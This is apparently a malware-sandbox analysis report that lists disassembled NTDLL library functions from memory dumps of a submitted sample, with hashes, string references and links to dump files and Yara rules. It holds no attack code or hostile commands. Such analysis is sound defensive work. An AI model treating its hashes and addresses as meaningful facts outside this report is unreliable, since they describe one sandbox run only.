LdrInitializeThunk.NTDLL(019EB508,00000004,000000FF,0000001E,00000000,00000000,00000000,C0000409,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 019A2D1A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b089febe1d09760294b911dbf95ef15d72835a38837b40e705ed751cee87a68
Instruction ID: cac5d649c995a8c39b50d746821bb3de4fbbe6b6639d105172ad83e953aa2831
Opcode Fuzzy Hash: 5b089febe1d09760294b911dbf95ef15d72835a38837b40e705ed751cee87a68
Instruction Fuzzy Hash: 3A90022921350002D1807158594C64A404D97D5202F95D415A0056558CC91589695721

Uniqueness

Uniqueness Score: -1.00%

Function 019A2D30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0198A52A,000000FF,?,01A567F8,01A3C9A0,00000020,0198A460,01A5689C,00000000,0000001D,?,014D2A48), ref: 019A2D3A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d27f0e763b3491bea2b402d367537563106dc19138ba55b130228ec43034c22
Instruction ID: 1f7faabb1d4aa205294bb75e0a87b9bd4c521567274e41ada390fbd1f3c50ade
Opcode Fuzzy Hash: 4d27f0e763b3491bea2b402d367537563106dc19138ba55b130228ec43034c22
Instruction Fuzzy Hash: 8890043130150003D140715C5D5C747C04DF7F5301F55D011F0455554CDD15CD575733

Uniqueness

Uniqueness Score: -1.00%

Function 019A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01983999,000000FA,00000001,?,00000050,?,?), ref: 019A2CAA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ed3f402d8c694064ad94b13c789c2866f1ed1eabfd26139f7cebaa639633712
Instruction ID: 37b073a10a3667ba43fb6d0059d21df73a1d4cc88eeac502bd9fc90605151af5
Opcode Fuzzy Hash: 5ed3f402d8c694064ad94b13c789c2866f1ed1eabfd26139f7cebaa639633712
Instruction Fuzzy Hash: 7C90023120150402D1007598594C686404D97E4301F55D011A5065555EC66589916631

Uniqueness

Uniqueness Score: -1.00%

Function 019A2C1D Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019BFD4F,000000FF,00000024,01A56634,00000004,00000000,?,-00000018,7D810F61,?,?,01978B12,?,?,?,?), ref: 019A2C24

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6e725163eb19ce44d2f74a4163d99b8f6c9e770df4b5321fbbd15517e9cc623
Instruction ID: af0930d87b4196689656c72aceb36c7eab5e87a5654f8c92c322fb5478741b88
Opcode Fuzzy Hash: c6e725163eb19ce44d2f74a4163d99b8f6c9e770df4b5321fbbd15517e9cc623
Instruction Fuzzy Hash: 01A00231581216478342AE144DC846DA15CFBD8221349C36AD9069A46BC72C689BBA71

Uniqueness

Uniqueness Score: -1.00%

Function 019A2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0195FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,019B7BE5,00001000,00004000,000000FF,?,00000000), ref: 019A2C7A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0dc9680faf090e5e7e7aa42aa6638d22e6c1c97d234ca8a5737bc25d03b18e0e
Instruction ID: 2e8880c39660592fab29a546a39a675ed2f4d414cdbf3dd5258213230b4002d0
Opcode Fuzzy Hash: 0dc9680faf090e5e7e7aa42aa6638d22e6c1c97d234ca8a5737bc25d03b18e0e
Instruction Fuzzy Hash: E290023120158802D1107158894878A404D97D4301F59C411A4465658DC69589917621

Uniqueness

Uniqueness Score: -1.00%

Function 019A2F90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019DCF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 019A2F9A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc73b3027e93329971cf4a2a40a6ee58ddcc9dba5c88852ef851660ea2bd6976
Instruction ID: 30b28347db88393c27a32d97a085646dbc8397cf871a7a60b0ae9f5faf64a629
Opcode Fuzzy Hash: dc73b3027e93329971cf4a2a40a6ee58ddcc9dba5c88852ef851660ea2bd6976
Instruction Fuzzy Hash: 3690023120190402D10071584D5874B404D97D4302F55C011A11A5555DC62589516A71

Uniqueness

Uniqueness Score: -1.00%

Function 019A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(019A05E3,00000000,00000000,00000001,00000000,00000000,00000000,?,019A2380,019A03B6,00000000,00000000,?,00000000,?), ref: 019A2FBA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db70bf8e57488127b1430a52d6ecc88fbd63beb6369fe72b208ec88394c4be3b
Instruction ID: 0fbf2686a872867b13a515a580a879b6558c86019bc0a7e9ca88b66c4e7e311d
Opcode Fuzzy Hash: db70bf8e57488127b1430a52d6ecc88fbd63beb6369fe72b208ec88394c4be3b
Instruction Fuzzy Hash: 4C90022160150042414071688D88946804DBBE5211755C121A09D9550DC55989655B65

Uniqueness

Uniqueness Score: -1.00%

Function 019A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(019A17E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 019A2FEA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d530204a2f8c72a62db44ec2de3182dab811d78bb1680cf81806a71d1ddde34
Instruction ID: 01ac144f02b3a265f7a162710cea20d0b0fa6fe2ced970ad84eaf1c1650bcb50
Opcode Fuzzy Hash: 5d530204a2f8c72a62db44ec2de3182dab811d78bb1680cf81806a71d1ddde34
Instruction Fuzzy Hash: 01900221211D0042D20075684D58B47404D97D4303F55C115A0195554CC91589615A21

Uniqueness

Uniqueness Score: -1.00%

Function 019A2F30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019EB4E6,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000000,00000000,00000000,00000058), ref: 019A2F3A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0575c8a0dbc80e5a5587eaf6df9cbdc1dfd1bfba2a739e847d5f57c45133e1d
Instruction ID: 14ecd3f9d6012c7cfdcb0582e0ef4eaf5dee35d02b42b3bfe33b92a7eb14a5f7
Opcode Fuzzy Hash: b0575c8a0dbc80e5a5587eaf6df9cbdc1dfd1bfba2a739e847d5f57c45133e1d
Instruction Fuzzy Hash: DF90026134150442D10071584958B46404DD7E5301F55C015E10A5554DC619CD526626

Uniqueness

Uniqueness Score: -1.00%

Function 019A2E80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019E809B,?,?,?,?,?), ref: 019A2E8A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3cdfa3efbe47ce11bb319d44582a904287d220a1297b56dd788b71a2929c0297
Instruction ID: e814a9cac28791fbe8d3402bf920076679265aae9cf762517f6af224c45c044a
Opcode Fuzzy Hash: 3cdfa3efbe47ce11bb319d44582a904287d220a1297b56dd788b71a2929c0297
Instruction Fuzzy Hash: 9890022160150502D10171584948656404E97D4241F95C022A1065555ECA258A92A631

Uniqueness

Uniqueness Score: -1.00%

Function 019A2EA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019C1B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 019A2EAA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e8b38cd14a6878c94fb8b71b7874f507ab814406ba4d38e473982a91f334dd20
Instruction ID: ca5d9289d09b10326c61110f94bf371bda941b7a074c46c5a9f8a75dc25d8aa3
Opcode Fuzzy Hash: e8b38cd14a6878c94fb8b71b7874f507ab814406ba4d38e473982a91f334dd20
Instruction Fuzzy Hash: A990027120150402D14071584948786404D97D4301F55C011A50A5554EC6598ED56B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F130 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1588431945.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_41f000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2d147494900e27e0b5567e293bd4d72aee526639646dc648dacfb9b43ee25e
Instruction ID: 799c57cb42787c0bf5d1ce17ac39346a2abfc1e09e798fb22bcb30c317675207
Opcode Fuzzy Hash: ed2d147494900e27e0b5567e293bd4d72aee526639646dc648dacfb9b43ee25e
Instruction Fuzzy Hash: A2A022A0C2830C03002030FA2B03023B30CC000008F8003EAAE8C022223C02A83300EB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 019A4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019A4A8F

Strings

0ITw, xrefs: 019A4AD0, 019A4AD5
0ITw, xrefs: 019A4AFA
0ITw, xrefs: 019A4ADA
0ITw, xrefs: 019A4B14
0ITw, xrefs: 019A4AEA, 019A4AEF
0ITw, xrefs: 019A4B04, 019A4B09

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0ITw$0ITw$0ITw$0ITw$0ITw$0ITw
API String ID: 3446177414-3283678409
Opcode ID: e1e0234ef7ee22832c8005c8535ab9a555bbefbbd7e79cfb39f157968539315f
Instruction ID: 9576c9a06115ef1b360030b71504a04459a4229ddaebfdb99be7075c5b7fb35c
Opcode Fuzzy Hash: e1e0234ef7ee22832c8005c8535ab9a555bbefbbd7e79cfb39f157968539315f
Instruction Fuzzy Hash: BC015E36E0D321EADBA09A2878047877A91B789738F89046AED0C9F289D7B44C46D7D5

Uniqueness

Uniqueness Score: -1.00%

Function 019A2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019A293C
___swprintf_l.LIBCMT ref: 019A295E
___swprintf_l.LIBCMT ref: 019A29A3
___swprintf_l.LIBCMT ref: 019DA52E

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 1c69a4cac370ef373009acefa5a7c98bc2a1836c5530cee74684b75a0b231d0b
Instruction ID: d415a0c3d4e354b85fe3b613ae7b62a5c1a0defbbd3f7c5fa0e21f00b563480a
Opcode Fuzzy Hash: 1c69a4cac370ef373009acefa5a7c98bc2a1836c5530cee74684b75a0b231d0b
Instruction Fuzzy Hash: A651E6B6A00116BFDB11DF9C898097EFBB8BB88641794C129F45DD7641D334DE1487E1

Uniqueness

Uniqueness Score: -1.00%

Function 0197A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019C79D5
SsHd, xrefs: 0197A3E4
RtlpFindActivationContextSection_CheckParameters, xrefs: 019C79D0, 019C79F5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019C79FA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: d78081f890830b02d2fcc0188a3a1d511843d17d033666a0fd2e970e6a2a8f9d
Instruction ID: a6fe72fd44b08ba5de9181e60333a6e483992c412ea720c94d8de7219d178744
Opcode Fuzzy Hash: d78081f890830b02d2fcc0188a3a1d511843d17d033666a0fd2e970e6a2a8f9d
Instruction Fuzzy Hash: 44E1D1706043028FE729CE6CC884B6EBBE9BF84755F184A2DE99DCB291D731D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0197D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019C948C

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019C9346
GsHd, xrefs: 0197D874
RtlpFindActivationContextSection_CheckParameters, xrefs: 019C9341, 019C9366
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019C936B

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 7e0f6129e253baaf2a593e1575a318facd29eb8b63e13b3787ddb11f937a2369
Instruction ID: d18a40a4586d9c9cf3b8e2045bbaf806a4904f5092b4b43c03284f753512e783
Opcode Fuzzy Hash: 7e0f6129e253baaf2a593e1575a318facd29eb8b63e13b3787ddb11f937a2369
Instruction Fuzzy Hash: 00E1B671604342CFDB24CF58C480B6ABBE9BF89B19F044A2DE99DDB281D771E944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 019AB6BF

Strings

+, xrefs: 019AB65A
-, xrefs: 019AB650
0, xrefs: 019AB66F
0, xrefs: 019AB695

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
